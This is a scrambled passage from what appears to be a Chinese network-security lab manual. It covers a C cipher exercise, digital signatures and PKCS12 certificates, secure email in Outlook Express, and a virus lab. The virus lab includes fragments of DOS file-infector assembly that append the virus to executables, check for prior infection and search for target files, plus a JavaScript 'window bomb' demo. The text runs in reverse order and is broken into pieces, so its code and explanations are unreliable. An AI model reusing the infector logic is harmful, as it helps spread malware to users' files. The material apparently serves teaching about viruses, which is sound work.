【正文】 b cx,dx int 21h call setdata jc fn_ret1 mov ax,4202h 。把本病毒寫至文件尾 xor cx,cx 。 add eax,ecx 。 sub fill,cx 。 得到文件的總長 mov cx,0fh and cx,ax 。 若已經(jīng)被感染就返回 jz fn_ret1 。 mov dx,offset temp 。 mov ah,3fh 。 sub dx,2 。 檢查是否已經(jīng)被我感染過 mov cx,word ptr [di+1ch] 。 mov ax,word ptr [si+016h] 。 mov ax,word ptr [si+014h] 。 。 cmp word ptr [si],39。 mov dx,offset sbuffer 。 讀文件頭 mov ah,03fh 。 jc fn_ret3 。 mov ax,4301h xor cx,cx int 21h mov ax,03d02h 。保存原文件屬性 int 21h 。 jae fn_ret 。 若文件小于 1K 或 大于 1M 不感染 jb fn_ret ?？蓤?zhí)行的文件頭的地址 mov di,offset dta 。 ret setfile endp db 09ah findfirst proc near mov ax,04e27h int 21h ret findfirst endp findnext proc near mov ah,04fh int 21h ret findnext endp modify proc near 。 mov fs,dx 。:C39。 找 c:\ mov si,dx 。 找 *. call setfile1 mov dx,offset bootcmd 。 fs 用于傳遞文件名的地址 call setfile1 。數(shù)據(jù)解密 push aaa mov dx,offset normal1 。用于 findfirst int 21h 。 aaa: call getdate ret aaa1: mov ah,01ah 。 ret 。 沒有作用只是干撓 jnz aaa1 。 這里既加密代碼 mov word ptr [si],ax 。 寫要執(zhí)行的代碼 int 13h not ax 。 db 09ah getdate proc near 。跳回原程序入口點(diǎn) push oldip 。 mov sp,cs:oldsp 。 29 mov sp,cs:oldss 。 pop es 。程序的核心部分 pop cs:oldip 。 并保存入棧 push oldip 。 mov ds,ax mov es,ax sub ax,oldseg 。 push ds 。 mov sp,stack_end mov ax,cs 。 對文件型病毒源代碼進(jìn)行分析 CODE SEGMENT assume cs:code .386 100h start: mov cs:oldsp,sp 。)， “窗口炸 彈”就會立刻爆炸。39。 該程序是一個模擬程序，在運(yùn)行之前會指示用戶可以使用 Ctrl + Alt + Del 鍵避免“窗口炸彈”的爆炸。如果你想避免炸彈的爆炸，給你一個機(jī)會試試：同時按動 Ctrl+Alt+Del 可能避免它的爆炸，如果你單擊〖確定〗按鈕則炸彈立刻爆炸?。?！ 39。CHARSET=GB2312 /HEAD BODY onload=WindowBombDemo() SCRIPT LANGUAGE=JavaScript alert(39。 【實(shí)驗(yàn)學(xué)時】 2 學(xué)時。 27 實(shí)驗(yàn)五 計(jì)算機(jī)病毒 實(shí)驗(yàn) 【實(shí)驗(yàn)?zāi)康摹? 通過實(shí)驗(yàn)，鞏固學(xué)生對計(jì)算機(jī)病毒的基本知識的理解，掌握計(jì)算機(jī)病毒的基本機(jī)制。 （ 3）當(dāng)收件人收到并打開已加密過的郵件時，將看到 加密郵件 的提示信息，按 “繼續(xù) ”按鈕后，可閱讀到該郵件的內(nèi)容。 26 （ 2）在 Outlook Express 6中撰寫新郵件或者回復(fù)已經(jīng)收到的郵件，寫好郵件內(nèi)容后，選取 “工具 ”菜單中的 “加密 ”項(xiàng)或單擊工具欄上的 “加密 ”按鈕，郵件的右側(cè)將會出現(xiàn)一個藍(lán)色的鎖型加密標(biāo)識。單擊該標(biāo)識，找到 “安全 ”項(xiàng)，單擊 “查看 證書 ”按鈕，可以查看 “發(fā)件人證書 ”；單擊 “添加到通訊簿 ”按鈕，在通訊簿中保存發(fā)件人的加密首選項(xiàng)，這樣對方數(shù)字證書就被添加到你的通訊簿中。獲得收件人數(shù)字證書的方法可以是讓對方給你發(fā)送帶有其數(shù)字簽名的郵件。在收件箱中，當(dāng)郵件未閱讀或簽名未檢查時，簽名證書標(biāo)志出現(xiàn)在未拆封信封圖標(biāo)（在發(fā)件人姓名前）的右側(cè)；當(dāng)雙擊郵件進(jìn)行安全檢查后，證書標(biāo)志出現(xiàn)在已拆封的信封圖標(biāo)的左側(cè)。 25 （ 3）當(dāng)收件人收到并打開有數(shù)字簽名的郵件時，將看到 “數(shù)字簽名郵件 ”的提示信息（用戶可以設(shè)置下次不提示該信息），按 “繼續(xù) ”按鈕后，才 可閱讀到該郵件的內(nèi)容。 （ 2）點(diǎn)擊新郵件窗口左邊的 “發(fā)送 ”按鈕。 使用 Outlook 發(fā)送附數(shù)字簽名的電子郵件 （ 1）單擊 Outlook Express 窗口中的 “新郵件 ”按鈕，撰寫新郵件內(nèi)容，填寫好收件人郵箱地址和郵件主題。勾選 “在服務(wù)器上保留郵件副本 ”。單擊 “確定 ”按鈕，完成證書設(shè)置。 23 （ 9）選取安全選項(xiàng)卡，選擇簽名證書和加密證書及算法。 （ 8）選取 “郵件 ”選項(xiàng)卡中用于發(fā)送安全郵件的帳號，然后單擊 “屬性 ”。 22 單擊 “下一步 ”，郵件設(shè)置成功。對電子郵件進(jìn)行簽名需要一個屬于你自己的數(shù)字證書，而要對電子郵件進(jìn)行加密則需要擁有對方的數(shù)字證書。 19 此時顯示前面你所選擇的所有設(shè)置，如果覺得完全正確則點(diǎn)擊 “完成 ”，如有錯誤則點(diǎn) 擊 “上一步 ”（如圖 16）。 18 選擇好以后點(diǎn)擊 “下一步 ”，此時為保護(hù)你的私鑰需要為你導(dǎo)入的證書的私鑰鍵入一個密碼（如圖 14）。 17 點(diǎn)擊 “導(dǎo)入 ”按鈕，此時會彈出證書導(dǎo)入向?qū)Вㄈ鐖D 12）。 打開一個 IE 瀏覽器，工具 —Inter 選項(xiàng) —內(nèi)容 —證書（如圖 11）。 16 此時顯示前面你所選擇的所有設(shè)置，如果覺得完全正確則點(diǎn)擊 “完成 ”，如有錯誤則點(diǎn)擊 “上一步 ”（如圖 10）。（如圖 6） 點(diǎn)擊 “下一步 ”，可以選擇是否將秘 鑰和證書一起導(dǎo)出（如圖 7） 15 因?qū)С龅淖C書按文件存放，故選擇導(dǎo)出文件的格式（如圖 8）。 打開一個 IE 瀏覽器，工具 ?Inter 選項(xiàng) ?內(nèi)容 ?證書（如圖 5）。如果需要在不同的電腦上使用同一張數(shù)字證書或者重新安裝電腦系統(tǒng)，就需要重新安裝根證書、導(dǎo)入個人證書及私鑰。雙擊證書查看證書內(nèi)容。用戶點(diǎn)擊 “下載并安裝數(shù)字證書 ”按鈕開始下載安裝證書，直到出現(xiàn) “安裝成功！ ”的提示。 下載安裝數(shù)字證書。注意要勾上 “標(biāo)記密鑰為可導(dǎo)出 ”、 “啟用嚴(yán)格密鑰保護(hù) ”、 “創(chuàng)建新密鑰對 ”三項(xiàng)， “Hash 算法 ”（可以選擇 “SHA1”）。 選擇 “免費(fèi)證書 ”欄目的 “用表格申請證書 ”，填寫申請表。在彈出的對話框中點(diǎn)擊 “安裝證書 ”按鈕 ，根據(jù)證書導(dǎo)入向?qū)崾?，完成?dǎo)入操作。 只有安裝了根證書鏈的計(jì)算機(jī)，才能完成網(wǎng)上申請的步驟和證書的正常使用。如果是第一次使用他們的個人證書需要先下載并安裝根 CA 證書。 【實(shí)驗(yàn)學(xué)時】 2 學(xué)時。 PKCS12 標(biāo)準(zhǔn)規(guī)定儲存或者傳輸用戶私鑰、證書和各種秘密的可移植格式。 PKCS12 公鑰加密標(biāo)準(zhǔn) 12 (PKCS12) 可包含所有私鑰、公鑰和證書。它是大多數(shù)瀏覽器的缺省格式，并按 ASN1 DER 格式存儲。它存儲用 Base64 編碼的 DER 格式數(shù)據(jù)，用 ascii 報頭包圍，因此適合系統(tǒng)之間的文本模式傳輸。任何人收到證書后都能使用簽名算法來驗(yàn)證證書是否是由 CA 的簽名密鑰簽發(fā)的。s Public Key 證書持有人的公鑰 Signature 驗(yàn)證機(jī)構(gòu)對證書的簽名 證書內(nèi)容由以下兩部分組成： （ 1） 申請者的信息 a) 版本信息，用來與 的將來版本兼容； b) 證書序列號，每一個由 CA 發(fā)行的證書必須有一個唯一的序列號； c) CA 所使用的簽名算法； d) 發(fā)行證書 CA 的名稱； e) 證書的有效期限； f) 證書主題名稱； H ERa [H（ M） ] KUa E KRa 比較 H || D M M 用戶 B 用戶 A 11 g) 被證明的公鑰信息，包括公鑰算法、公鑰的位字符串表示； h) 包含額外信息的特別擴(kuò)展。 證書已應(yīng)用于許多網(wǎng)絡(luò)安全，其中包括 IPSec（ IP 安全）、 SSL、 SET、 S/MIME。認(rèn)證中心頒發(fā)的數(shù)字證書均遵循 V3 標(biāo)準(zhǔn)。數(shù)字證書是一個經(jīng)證書認(rèn)證中心（ CA）數(shù)字簽名的包含公開密鑰擁有者信息以及公開密鑰的文件。使用數(shù)字簽名就可以確定文件沒有被故意更改。 這種技術(shù)具有我們需要的全部特征（屬性）： 1) 難以偽造：只有私人密鑰的持有人才能生成簽名； 2) 無法抵賴：由于極難偽造，所以對于一份經(jīng)過簽名的文檔來說，簽署人很難抵賴這不是自己的“手跡”； 3) 不可更改：一經(jīng)簽名，文檔便不能修改； 4) 不能轉(zhuǎn)移：簽名不能移走，并加入另一個不相干的文檔。哈希函數(shù)可以把任意長度的輸入串變化成固定長度的輸出串，因此，數(shù)字簽名利用哈希函數(shù)將一份文檔縮減成一個摘要。但是在實(shí)際情況下，公開 密鑰算法在加密長文檔時運(yùn)行太慢。除此以外，因?yàn)閿?shù)字簽名不是被簽明消息的物理組成部分，它還必須保證消息的完整性，在一份經(jīng)數(shù)字簽名的文件中，我們希望禁止再增加額外的文字，也希望禁止從一份真實(shí)可靠的、已經(jīng)簽署的文檔中移出簽名，將其轉(zhuǎn)嫁到其他文檔。 ? 首先，手寫簽名是被簽署文件的物理組成部分，而數(shù)字簽名不是； ? 其次，手寫簽名不易拷貝，而數(shù)字簽名正好相反，因此必須阻止一個數(shù) 字簽名的重復(fù)使用； ? 第三，手寫簽名是通過與一個真實(shí)的手寫簽名比較來進(jìn)行驗(yàn)證，而數(shù)字簽名是通過一個公開的驗(yàn)證算法來驗(yàn)證。 【實(shí)驗(yàn)預(yù)備知識】 數(shù)字簽名原理 在日常生活中，經(jīng)常需要人們簽署各種信件和文書，隨著信息時代的來臨，人們希望對越來越多的電子文件進(jìn)行迅速的、遠(yuǎn)距離的簽名，這就是數(shù)字簽名。 【實(shí)驗(yàn)報告】 闡述本實(shí)驗(yàn)中的數(shù)字簽名原理。 將每個文件的數(shù)字簽名保存在數(shù)據(jù)庫中，也可保存在目錄中，但須考慮簽名的安全性。 K公鑰 E K私鑰 比較 H D M M H 文件摘要 數(shù)字簽名 簽名數(shù)據(jù)庫 簽名數(shù)據(jù)庫 數(shù)字簽名 文件摘要 摘要算法 摘要算法 生成簽名過程 驗(yàn)證過程 9 【實(shí)驗(yàn)參考步驟】 選定進(jìn)行數(shù)字簽名和驗(yàn)證所需的 PKCS12 文件。 【實(shí)驗(yàn)環(huán)境】 （ 1） 生成好的數(shù)字證書和私鑰，以 PKCS12 文件形式存放。 （ 3）能對所選的文件進(jìn)行數(shù)字簽名。 按照上圖所示的文件完整性保護(hù)過程編寫程序，該程序應(yīng)能實(shí)現(xiàn)以下內(nèi)容： （ 1）提供一個主運(yùn)行界面，能在該界面里選擇公鑰證書存放路徑和私鑰文件存放路徑。 密鑰長度 1024 位。 【實(shí)驗(yàn)學(xué)時】 2 學(xué)時。 （ 1） d=3 c=24。 free(key)。 free(_plntxt)。j = i。 } //屏幕輸出密文 printf(The ciphertext is :)。z39。a39。amp。Z39。A39。A39。a39。a39。z39。amp。a39。a39。A39。a39。Z39。amp。A39。z39。amp。a39。A39。a39。A39。z39。amp。a39。a39。A39。A39。Z39。amp。A39。Z39。amp。A39。i strlen(_plntxt)。 } else i++。\039。 while(i N) { // key[i%strlen(key)] = getchar()。 printf(Enter the key: \n)。 exit(1)。 } _cphrtxt = (int *)malloc(N * sizeof(int))。 if(key == NULL) { printf(Memory location failed!)。 unsigned int i = 0,j。 int* _cphrtxt。 free(_cphrtxt)。j++) printf(%c,_cphrtxt[j])。 6 for(j = 0。 else //如果為其他字符，則不變輸出